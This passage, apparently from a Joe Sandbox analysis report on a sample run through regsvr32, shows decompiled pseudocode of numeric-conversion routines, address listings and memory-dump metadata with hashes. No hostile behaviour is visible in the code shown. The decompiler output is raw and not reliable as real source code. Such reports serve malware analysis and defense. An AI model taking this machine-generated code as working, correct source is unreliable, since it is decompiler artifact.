																_t154 = r9w | 0x00000001;
																_a80 = _t154;
																r9d = _a80;
																goto L75;
															}
															r8d = _a88;
															_t198 = _a84;
															r9d = _a80;
															while(1) {
																asm("inc ecx");
																if(__eflags < 0) {
																	break;
																}
																r8d = r8d + r8d;
																_t190 = _t198 >> 0x1f;
																r9d = r9d + r9d;
																_t198 = _t198 + _t198 | r9d >> 0x0000001f;
																r8d = r8d | _t190;
																_t204 = _t204 + 0xffff;
																_a84 = _t198;
																_a88 = r8d;
																__eflags = _t204;
																_a80 = r9d;
																if(__eflags > 0) {
																	continue;
																}
																goto L82;
															}
															__eflags = _t204;
															if(_t204 <= 0) {
																goto L82;
															}
															goto L74;
														}
														_t203 = _t203 + 1;
														asm("btr eax, 0x1f");
														__eflags = _t253[2];
														if(_t253[2] != 0) {
															goto L52;
														}
														__eflags = _t253[1];
														if(_t253[1] != 0) {
															goto L52;
														}
														__eflags =  *_t253;
														if( *_t253 != 0) {
															goto L52;
														}
														_t229 = _a64;
														_a104 = 0;
														_a100 = 0;
														_a96 = 0;
														goto L96;
													}
													_t203 = _t203 + 1;
													asm("btr eax, 0x1f");
													__eflags = _a104;
													if(_a104 != 0) {
														goto L47;
													}
													__eflags = _a100;
													if(_a100 != 0) {
														goto L47;
													}
													__eflags = _a96;
													if(_a96 != 0) {
														goto L47;
													}
													_t229 = _a64;
													_a106 = 0;
													goto L96;
												}
												_t229 = _a64;
												_a104 = 0;
												_a100 = 0;
												_a96 = 0;
											}
											L96:
											__eflags = r8d;
										} while (r8d != 0);
										_t202 = 0;
									}
									goto L99;
								}
							}
							do {
								_t247 = _t247 - 1;
								r10d = r10d + 0xffffffff;
								_t180 = _t180 + 1;
								__eflags =  *_t247;
							} while ( *_t247 == 0);
							goto L20;
						}
						_t178 = _a151 & 0x000000ff;
						__eflags = _t178 - 5;
						if(_t178 >= 5) {
							_t179 = _t178 + 1;
							__eflags = _t179;
							_a151 = _t179;
						}
						_t246 = _t246 - 1;
						r10d = 0x18;
						_t180 = _t180 + 1;
						goto L17;
					}
					if(_t201 != 0x2d) {
						_t240 = _t232;
						_t202 = 0;
						goto L9;
					}
					r9d = 7;
					r14d = __r9 - 8;
				}
				L1:
				_t201 =  *_t239 & 0x000000ff;
				_t239 =  &(_t239[1]);
				if(r9d <= 0xb) {
					_t214 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}



















































                                                                              0x1004f0c4
                                                                              0x1004f0c4
                                                                              0x1004f0c4
                                                                              0x1004f0c4
                                                                              0x1004f0c4
                                                                              0x1004f0c4
                                                                              0x1004f0cc
                                                                              0x1004f1a6
                                                                              0x1004f1aa
                                                                              0x00000000
                                                                              0x1004f0d2
                                                                              0x1004f0d5
                                                                              0x1004f0d9
                                                                              0x1004f0fa
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004f0de
                                                                              0x1004f19c
                                                                              0x1004f19f
                                                                              0x00000000
                                                                              0x1004f19f
                                                                              0x1004f0e4
                                                                              0x1004f0f1
                                                                              0x1004f0f1
                                                                              0x1004ecc0
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e3c8a9a3eb12ef5ad50af1fae641a493f57749b30e5e4eea377e955d0d529646
                                                                              • Instruction ID: e4996b0391c032e334f1a120aed140550c162443b92272f61bd4a538bded1be3
                                                                              • Opcode Fuzzy Hash: e3c8a9a3eb12ef5ad50af1fae641a493f57749b30e5e4eea377e955d0d529646
                                                                              • Instruction Fuzzy Hash: E55104776287D5C6D760CF25E0087AEB7A1F385780FA1412AEA89C3A68DB7DD441CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F08C Relevance: .2, Instructions: 157COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004F08C(void* __ebx, signed int __ebp, void* __rdx, void* __r8, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t137;
				signed int _t138;
				signed short _t148;
				signed short _t149;
				signed short _t153;
				signed short _t154;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed char _t178;
				void* _t179;
				signed int _t180;
				signed int _t181;
				signed short _t182;
				signed short _t183;
				signed int _t185;
				signed int _t189;
				void* _t191;
				signed int _t192;
				signed short _t196;
				signed int _t197;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t206;
				signed int _t207;
				void* _t215;
				signed long long _t221;
				void* _t222;
				void* _t224;
				long long _t226;
				signed int* _t227;
				long long _t229;
				void* _t231;
				signed long long _t234;
				long long _t237;
				void* _t239;
				signed int* _t240;
				void* _t241;
				signed int _t242;
				void* _t243;
				char* _t244;
				signed short* _t245;
				long long* _t247;
				signed int* _t250;

				_t247 = __r13;
				_t243 = __r11;
				_t236 = __r8;
				_t224 = __rdx;
				_t207 = __ebp;
				_t179 = __ebx;
				if(__rdx - 0x31 > 8) {
					__eflags = _t191 - 0x30;
					if(_t191 != 0x30) {
						_t237 = _t229;
						_t201 = 0;
						goto L8;
					}
					r9d = 8;
				} else {
					r9d = 9;
					_t236 = __r8 - 1;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t201 = 0;
					__eflags = 0;
					L8:
					__eflags = _t207;
					 *_t247 = _t237;
					if(_t207 == 0) {
						r8d = _t201;
						_t192 = _t201;
						_t201 = 4;
						L102:
						_t181 = 0;
						_t137 = 0;
						__eflags = 0;
						L103:
						_t240 = _a72;
						_t138 = _t137 | _a52;
						__eflags = _t138;
						_t240[2] = _t138;
						 *_t240 = _t181;
						_t240[0] = _t192;
						_t240[1] = r8d;
						__eflags = _a160 ^ _t234;
						return E10038D20(_t181, _a160 ^ _t234);
					}
					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t201;
							_t192 = _t201;
							goto L102;
						}
						L15:
						_t244 = _t243 - 1;
						__eflags =  *_t244;
						if( *_t244 != 0) {
							L18:
							_t10 =  &_a96; // 0x61
							_t11 =  &_a128; // 0x81
							E10052690(r10d, _t215, _t11, _t224, _t229, _t231, _t10, _t239, _t241, _t244);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t179;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d + _a288;
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d - _a296;
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t192 = _t201;
								_t137 = 0x7fff;
								r8d = 0x80000000;
								_t201 = 2;
								_t181 = 0;
								goto L103;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t201;
									_t192 = _t201;
									_t201 = 1;
									goto L102;
								}
								_t226 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L97:
									_t181 = _a96 & 0x0000ffff;
									_t192 = _a98;
									r8d = _a102;
									_t137 = _a104 >> 0x10;
									goto L103;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t226 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags = _a56;
								_t144 =  ==  ? 0 : _a96 & 0x0000ffff;
								__eflags = r8d;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t201 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t226 = _t226 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										_a48 = r8d;
										_a64 = _t226;
										if((r8d & 0x00000007) == 0) {
											goto L94;
										}
										_t221 = _t211 + _t211 * 2;
										__eflags =  *((short*)(_t226 + _t221 * 4)) - 0x8000;
										_t250 = _t226 + _t221 * 4;
										if( *((short*)(_t226 + _t221 * 4)) >= 0x8000) {
											_t27 =  &_a112; // 0x71
											_t221 = _t27;
											 *_t221 =  *_t250;
											_t175 = _t250[2];
											_t29 =  &_a112; // 0x71
											_t250 = _t29;
											 *(_t221 + 8) = _t175;
											_t211 = _a112 >> 0x10;
											_t176 = _t175 - 1;
											__eflags = _t176;
											_a114 = _t176;
										}
										_t182 = _t250[2] & 0x0000ffff;
										_t148 = _a106 & 0x0000ffff;
										r15d = 0;
										_t183 = _t182 & 0x00007fff;
										_a80 = 0;
										_t149 = _t148 & 0x00007fff;
										_a84 = 0;
										_t196 = (_t182 & 0x0000ffff ^ _t148) & 0x00008000;
										__eflags = _t149 - 0x7fff;
										_a88 = 0;
										_a56 = _t196;
										_t202 = _t211 + _t221;
										if(_t149 >= 0x7fff) {
											L93:
											__eflags = _t196;
											_t226 = _a64;
											_t151 =  !=  ? r9d : 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t183 - 0x7fff;
											if(_t183 >= 0x7fff) {
												goto L93;
											}
											__eflags = _t202 - 0xbffd;
											if(_t202 > 0xbffd) {
												goto L93;
											}
											__eflags = _t202 - 0x3fbf;
											if(_t202 > 0x3fbf) {
												__eflags = _t149;
												if(_t149 != 0) {
													L45:
													__eflags = _t183;
													if(_t183 != 0) {
														L50:
														r13d = 0;
														_t227 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t180 = r12d;
															_t222 = _t247 + _t247;
															if(r12d <= 0) {
																goto L65;
															}
															_t57 =  &(_t250[2]); // 0x9
															_t242 = _t57;
															_t59 = _t222 + 0x60; // 0x65
															_t245 = _t234 + _t59;
															_t206 = r13d & 0x00000001;
															__eflags = _t206;
															do {
																_t185 = ( *_t245 & 0x0000ffff) * ( *_t242 & 0x0000ffff);
																__eflags = _t206;
																if(_t206 == 0) {
																	r8d = 0;
																	r9d = _t211 + _t222;
																	__eflags = r9d -  *(_t227 - 4);
																	if(r9d <  *(_t227 - 4)) {
																		L60:
																		r8d = 1;
																		L61:
																		 *(_t227 - 4) = r9d;
																		goto L62;
																	}
																	__eflags = r9d - _t185;
																	if(r9d >= _t185) {
																		goto L61;
																	}
																	goto L60;
																}
																r8d = 0;
																r9d = _t211 + _t222;
																__eflags = r9d -  *(_t227 - 4);
																if(r9d <  *(_t227 - 4)) {
																	L56:
																	r8d = 1;
																	L57:
																	 *(_t227 - 4) = r9d;
																	goto L62;
																}
																__eflags = r9d - _t185;
																if(r9d >= _t185) {
																	goto L57;
																}
																goto L56;
																L62:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t227 =  *_t227 + 1;
																	__eflags =  *_t227;
																}
																_t180 = _t180 - 1;
																_t245 =  &(_t245[1]);
																_t242 = _t242 - 2;
																__eflags = _t180;
															} while (_t180 > 0);
															L65:
															r12d = r12d - 1;
															_t227 =  &(_t227[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t203 = _t202 + 0xc002;
														__eflags = _t203;
														if(__eflags <= 0) {
															r8d = _a88;
															_t197 = _a84;
															r9d = _a80;
															L80:
															_t203 = _t203 + 0xffff;
															__eflags = _t203;
															if(_t203 >= 0) {
																L72:
																_t153 = _a80 & 0x0000ffff;
																L73:
																__eflags = _t153 - 0x8000;
																if(_t153 > 0x8000) {
																	L75:
																	_t154 = _a82;
																	__eflags = _t154 - 0xffffffff;
																	if(_t154 != 0xffffffff) {
																		_t155 = _t154 + 1;
																		__eflags = _t155;
																		_a82 = _t155;
																		_t197 = _a84;
																	} else {
																		_t159 = _a86;
																		_a82 = 0;
																		__eflags = _t159 - 0xffffffff;
																		if(_t159 != 0xffffffff) {
																			_a86 = _t159 + 1;
																			r8d = _a88;
																			_t197 = _a84;
																		} else {
																			_t161 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t161 - 0xffff;
																			if(_t161 != 0xffff) {
																				_t197 = _a84;
																				_a90 = _t161 + 1;
																				r8d = _a88;
																			} else {
																				_t197 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t203 = _t203 + 1;
																			}
																		}
																	}
																	L90:
																	__eflags = _t203 - 0x7fff;
																	if(_t203 < 0x7fff) {
																		_a98 = _t197;
																		_t226 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t203 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t226 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t158 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L94;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L90;
																}
																goto L75;
															}
															r10d =  ~(_t203 & 0x0000ffff) & 0x0000ffff;
															_t203 = _t203 + r10w;
															__eflags = _t203;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t197 << 0x0000001f;
																r8d = r8d >> 1;
																_t197 = _t197 >> 0x00000001 | r8d << 0x0000001f;
																_t242 = _t242 - 1;
																__eflags = _t242;
																_a80 = r9d;
															} while (_t242 != 0);
															__eflags = r15d;
															_a84 = _t197;
															_a88 = r8d;
															if(r15d == 0) {
																goto L72;
															}
															_t153 = r9w | 0x00000001;
															_a80 = _t153;
															r9d = _a80;
															goto L73;
														}
														r8d = _a88;
														_t197 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t189 = _t197 >> 0x1f;
															r9d = r9d + r9d;
															_t197 = _t197 + _t197 | r9d >> 0x0000001f;
															r8d = r8d | _t189;
															_t203 = _t203 + 0xffff;
															_a84 = _t197;
															_a88 = r8d;
															__eflags = _t203;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L80;
														}
														__eflags = _t203;
														if(_t203 <= 0) {
															goto L80;
														}
														goto L72;
													}
													_t202 = _t202 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t250[2];
													if(_t250[2] != 0) {
														goto L50;
													}
													__eflags = _t250[1];
													if(_t250[1] != 0) {
														goto L50;
													}
													__eflags =  *_t250;
													if( *_t250 != 0) {
														goto L50;
													}
													_t226 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L94;
												}
												_t202 = _t202 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L45;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L45;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L45;
												}
												_t226 = _a64;
												_a106 = 0;
												goto L94;
											}
											_t226 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L94:
										__eflags = r8d;
									} while (r8d != 0);
									_t201 = 0;
								}
								goto L97;
							}
						}
						do {
							_t244 = _t244 - 1;
							r10d = r10d + 0xffffffff;
							_t179 = _t179 + 1;
							__eflags =  *_t244;
						} while ( *_t244 == 0);
						goto L18;
					}
					_t177 = _a151 & 0x000000ff;
					__eflags = _t177 - 5;
					if(_t177 >= 5) {
						_t178 = _t177 + 1;
						__eflags = _t178;
						_a151 = _t178;
					}
					_t243 = _t243 - 1;
					r10d = 0x18;
					_t179 = _t179 + 1;
					goto L15;
				}
				L1:
				_t236 = _t236 + 1;
				if(r9d <= 0xb) {
					_t211 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}



















































                                                                              0x1004f08c
                                                                              0x1004f08c
                                                                              0x1004f08c
                                                                              0x1004f08c
                                                                              0x1004f08c
                                                                              0x1004f08c
                                                                              0x1004f091
                                                                              0x1004f0a9
                                                                              0x1004f0ac
                                                                              0x1004f195
                                                                              0x1004f198
                                                                              0x00000000
                                                                              0x1004f198
                                                                              0x1004f0b2
                                                                              0x1004f093
                                                                              0x1004f093
                                                                              0x1004f099
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
